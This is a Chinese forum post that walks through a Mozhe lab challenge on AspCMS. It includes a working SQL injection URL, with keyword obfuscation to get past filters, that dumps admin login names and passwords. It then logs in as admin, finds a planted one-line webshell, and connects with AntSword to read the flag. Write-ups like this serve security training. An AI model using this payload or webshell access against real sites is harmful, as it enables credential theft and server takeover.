讨论社区  /   日志  /   帖子详情
墨者CMS系统漏洞分析溯源(第4题)题解
2022-07-28 15:28:32
157
{{single.collect_count}}

打开给的链接的页面,能发现是aspcms,还给了一个登录框
在这里插入图片描述
通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码

http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

在这里插入图片描述
对密码进行一下解密
在这里插入图片描述

登录进去
在这里插入图片描述
点击后台管理,编辑模板/css文件
在这里插入图片描述

点击第一个文件编辑看看,能看到这是一个一句话木马
在这里插入图片描述
重新回去,能看到所在的具体位置
在这里插入图片描述
使用蚁剑连接试试

在这里插入图片描述
进去,然后找到根目录,能看到key的文件
在这里插入图片描述
在这里插入图片描述

回帖
全部回帖({{commentCount}})
{{item.user.nickname}} {{item.user.group_title}} {{item.friend_time}}
{{item.content}}
{{item.comment_content_show ? '取消' : '回复'}} 删除
回帖
{{reply.user.nickname}} {{reply.user.group_title}} {{reply.friend_time}}
{{reply.content}}
{{reply.comment_content_show ? '取消' : '回复'}} 删除
回帖
收起
没有更多啦~
{{commentLoading ? '加载中...' : '查看更多评论'}}
发帖
加入PHP技术QQ群
一个专属于OneKeyAdmin的技术交流平台,记录OneKeyAdmin开发者的成长与进步。
主题帖
6221
回帖数
143
{{userInfo.nickname}} {{userInfo.group_title}}
{{userInfo.describe}}
文章
{{blog_count}}
回帖
{{blog_comment_count}}
收藏
{{blog_collect_count}}
登陆  /   注册
文章
-
评论
-
粉丝
-
热门帖子
1  WordPress Rest API 入门详解
2773
2  Thinkphp5.0 获取新增数据的ID
2743
3  thinkphp5 解决跨域问题
2296
4  Yandex企业邮箱注册
1984
5  Thinkphp6 的 where 查询条件 and 和 or 的 操作
1849
6  PHP的exec()函数用法详解
1840
7  thinkphp5使用数据库表锁
1628
8  Thinkphp如何查看当前是哪个版本?查看thinkphp当前版本号的三种方法
1624
9  thinkphp6 如何输出json数据
1585
10  h5网站模板_超全超实用的80个模板网站,我全部整理在这里了
1580

Copyright © 2021-2024 onekeyadmin.com All rights reserved 温州市万旗信息科技有限公司 版权所有  网站备案/许可证号:浙ICP备2022028513号-1